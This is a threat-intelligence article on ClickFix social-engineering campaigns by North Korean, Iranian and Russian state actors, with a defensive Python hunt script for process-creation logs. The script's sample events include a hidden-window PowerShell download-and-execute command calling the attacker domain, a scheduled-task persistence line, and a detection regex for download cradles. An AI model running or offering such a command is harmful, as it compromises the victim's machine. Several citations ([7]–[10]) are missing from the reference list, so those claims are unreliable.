
State-sponsored threat actors from North Korea, Iran, and Russia have adopted the “ClickFix” social engineering tactic against high-value targets, including government, defense, and financial sectors. The method tricks victims into copying an attacker-supplied PowerShell or terminal command and running it themselves under a false pretext, so no exploit, macro, or dropped executable is needed for initial execution; it has been in use by advanced persistent threat (APT) groups since late 2024 [1]. Recent reporting has also linked ClickFix to ransomware deployments and data theft, signaling a blurring of cybercrime and espionage operations [2], [3].
TL;DR: Key Takeaways
- ClickFix Definition: Social engineering lures (fake CAPTCHA checks, “device registration” or “error fix” dialogs) that instruct the victim to paste a prepared command into the Windows Run dialog or a terminal, so the victim’s own hands perform the execution [4].
- Primary Actors: North Korea’s TA427 (Kimsuky-linked), Iran’s TA450 (MuddyWater), and Russia’s APT28 (Proofpoint’s TA422) and UNK_RemoteRogue [5].
- Reported Ransomware Links: Some reporting ties ClickFix-enabled intrusions to the Qilin and Black Basta ransomware operations [6]; that connection is not made in the Proofpoint research [3] and should be treated as unconfirmed.
- Critical IOCs: The domain securedrive.fin-tech[.]com and the IP address 5.231.4[.]94 are tied to these campaigns [7].
Campaign Breakdown by APT Group
TA427 (North Korea): This group impersonates Japanese diplomats via spoofed emails carrying a PDF lure. The PDF points to a fake “secure drive” link whose “device registration” page tells the target to run a PowerShell command; that script writes and launches a VBS file, which registers a scheduled task for persistence and ultimately delivers QuasarRAT [8]. A newly identified domain, securedrive.fin-tech[.]com, has been linked to their infrastructure as of April 2025 [7].
TA450 (Iran): Posing as a Microsoft security update, TA450 walks the target through installing the “Level” remote monitoring and management (RMM) tool, giving the operators a signed, legitimate remote-access channel. Targets span Middle East, U.S., and European entities. Source [6] reports overlaps with Qilin ransomware activity, including the Lee Enterprises incident; the Proofpoint research [3] does not make that connection.
Russian APTs (APT28 & UNK_RemoteRogue): APT28 sent a link to a Google Spreadsheet that presents a fake reCAPTCHA prompt; the “verification” command opens an SSH tunnel and delivers Metasploit payloads. UNK_RemoteRogue sent its lures from compromised Zimbra servers, using fake Microsoft Office links whose page runs JavaScript and a pasted PowerShell command to deploy the Empire C2 framework [9]. Source [6] ties both groups to Black Basta ransomware incidents, including the attack on Southern Water that the utility has said cost about £4.5M; that attribution is likewise absent from [3].
Technical Mitigation Strategies
To counter ClickFix attacks, organizations should:
- Constrain PowerShell rather than assume it can be blocked outright: enforce AppLocker or WDAC policies so unsigned scripts cannot run from user-writable paths, put non-admin users in Constrained Language Mode, and enable script block logging (Event ID 4104) and process creation auditing with command-line capture (Event ID 4688) so pasted one-liners are recorded.
- Remove the Run dialog from standard-user desktops where it has no business use (Group Policy: User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”), and hunt the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key for commands users have pasted.
- Alert on RMM agents such as AnyDesk and Level that are not on the approved-tool list, and on explorer.exe or a browser spawning PowerShell, mshta, or a script host with hidden-window, encoded, or download-and-execute arguments.
- Keep internet-facing mail and collaboration servers patched: UNK_RemoteRogue sent its lures from compromised Zimbra instances [9]. Note that CVE-2024-50623 and CVE-2024-55956 [10] are Cleo file-transfer product vulnerabilities, not Zimbra or Microsoft flaws, and none of the sources cited here ties a specific CVE to these ClickFix campaigns.
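The following hunt script is an added example, not code from the original page or from any vendor it names. It reconstructs the TA427-style chain described above (Run dialog to PowerShell to VBS script host to schtasks) and the RMM-tool and download-cradle traits from the mitigation list, and runs them over constructed Sysmon-style process-creation events. The field names, the sample events, the defanged URL in the pasted command, and the RMM binary names are assumptions for illustration.

```python
"""Hunt for ClickFix-style execution chains in process-creation telemetry.

Added example; not code from the page or from any vendor named on it.
The sample events below are constructed, not real captures.
"""
import json
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 style records, flattened to one JSON object per line.
# The chain 5200 -> 5300 -> 5400 mirrors the TA427 pattern: PowerShell pasted into the
# Run dialog, spawning a VBS file, which registers a scheduled task for persistence.
SAMPLE_LOG = r"""
{"pid": 4100, "ppid": 1200, "image": "C:\\Windows\\explorer.exe", "parent_image": "C:\\Windows\\System32\\userinit.exe", "cmdline": "C:\\Windows\\explorer.exe"}
{"pid": 5200, "ppid": 4100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell -w hidden -c \"iex (irm https://securedrive.fin-tech[.]com/reg)\""}
{"pid": 5300, "ppid": 5200, "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "wscript.exe C:\\Users\\alice\\AppData\\Local\\Temp\\update.vbs"}
{"pid": 5400, "ppid": 5300, "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "schtasks /create /sc minute /mo 10 /tn SecureDriveSync /tr C:\\Users\\alice\\AppData\\Local\\Temp\\update.vbs"}
{"pid": 6100, "ppid": 4100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"}
{"pid": 6200, "ppid": 900, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "powershell.exe -NoProfile -Command Get-Date"}
{"pid": 7000, "ppid": 4100, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\AnyDesk.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "AnyDesk.exe --silent"}
"""

# Parent processes a user reaches from the Win+R Run dialog or the desktop.
RUN_DIALOG_HOSTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed binary names; verify against the RMM tools actually deployed in your estate.
RMM_BINARIES = {"anydesk.exe", "level.exe", "level-windows.exe"}

# Command-line traits typical of pasted ClickFix one-liners: hidden window, encoded
# payload, download-and-execute cradles, or an LOLBin used as the loader.
SUSPICIOUS = re.compile(
    r"-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|\biex\b|invoke-expression|\birm\b|invoke-(?:webrequest|restmethod)"
    r"|downloadstring|\bmshta\b|\bcurl\b",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'powershell.exe'."""
    return PureWindowsPath(path).name.lower()


def parse_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(events, pid):
    """Process chain from pid up to the root we have telemetry for, child first."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return one finding per matched rule, each with the reconstructed process chain."""
    findings = []
    for ev in events:
        img, parent, cmd = basename(ev["image"]), basename(ev["parent_image"]), ev["cmdline"]
        hits = []
        # Rule 1: shell launched from the Run dialog with a hide/encode/download trait.
        if parent in RUN_DIALOG_HOSTS and img in SHELLS:
            m = SUSPICIOUS.search(cmd)
            if m:
                hits.append(("clickfix_run_dialog", m.group(0)))
        # Rule 2: shell handing off to a VBS/JS script host (TA427 second stage).
        if parent in SHELLS and img in SCRIPT_HOSTS:
            hits.append(("script_host_from_shell", cmd))
        # Rule 3: scheduled task created by a script host or shell (persistence).
        if img == "schtasks.exe" and "/create" in cmd.lower() and parent in SHELLS | SCRIPT_HOSTS:
            hits.append(("persistence_from_script", cmd))
        # Rule 4: any RMM agent launch; triage against the approved-tool list.
        if img in RMM_BINARIES:
            hits.append(("rmm_tool_launch", ev["image"]))
        for rule, evidence in hits:
            findings.append({"pid": ev["pid"], "rule": rule, "evidence": evidence,
                             "chain": " <- ".join(ancestry(events, ev["pid"]))})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_LOG)):
        print(f"[{f['rule']}] pid={f['pid']} chain={f['chain']} :: {f['evidence']}")
```

The two benign PowerShell launches (a scheduled backup script and a service-spawned command) are not flagged because the rules key on parent process plus command-line traits rather than on powershell.exe alone; that is the distinction that keeps a ClickFix detection usable in an environment where PowerShell cannot simply be blocked. Swap the constructed records for your EDR's process-creation export and adjust the field names.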
Conclusion
The adoption of ClickFix by state-sponsored actors underscores the tactic’s effectiveness: by having the victim run the command, it sidesteps exploit-based and attachment-based controls entirely. With ransomware groups reported to be co-opting the same lures, the line between espionage and cybercrime continues to blur. Prompt action on the technical controls above, paired with user training that explains why no legitimate verification step asks you to paste a command, is critical to mitigate the risk.
References
- [1] “State-Sponsored Hackers Weaponize ClickFix in Global Cyber Espionage Campaigns,” The Hacker News, Apr. 2025. [Online]. Available: https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
- [2] “State-Sponsored Hackers Embrace ClickFix Social Engineering Tactic,” BleepingComputer, Apr. 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic/
- [3] “Around the World in 90 Days: State-Sponsored Actors Try ClickFix,” Proofpoint, Apr. 2025. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
- [4] “Do Not Click If You See This on Your PC—It’s an Attack,” Forbes, Apr. 2025. [Online]. Available: https://www.forbes.com/sites/zakdoffman/2025/04/21/do-not-click-if-you-see-this-on-your-pc-its-an-attack/
- [5] “State-Sponsored Actors Spotted Using ClickFix,” TechRadar/Yahoo, Apr. 2025. [Online]. Available: https://www.yahoo.com/news/state-sponsored-actors-spotted-using-160300677.html
- [6] “State-Sponsored Hackers Leverage ClickFix in Global Cyber Espionage,” SecureBlink, Apr. 2025. [Online]. Available: https://www.secureblink.com/cyber-security-news/state-sponsored-hackers-leverage-click-fix-social-engineering-in-global-cyber-espionage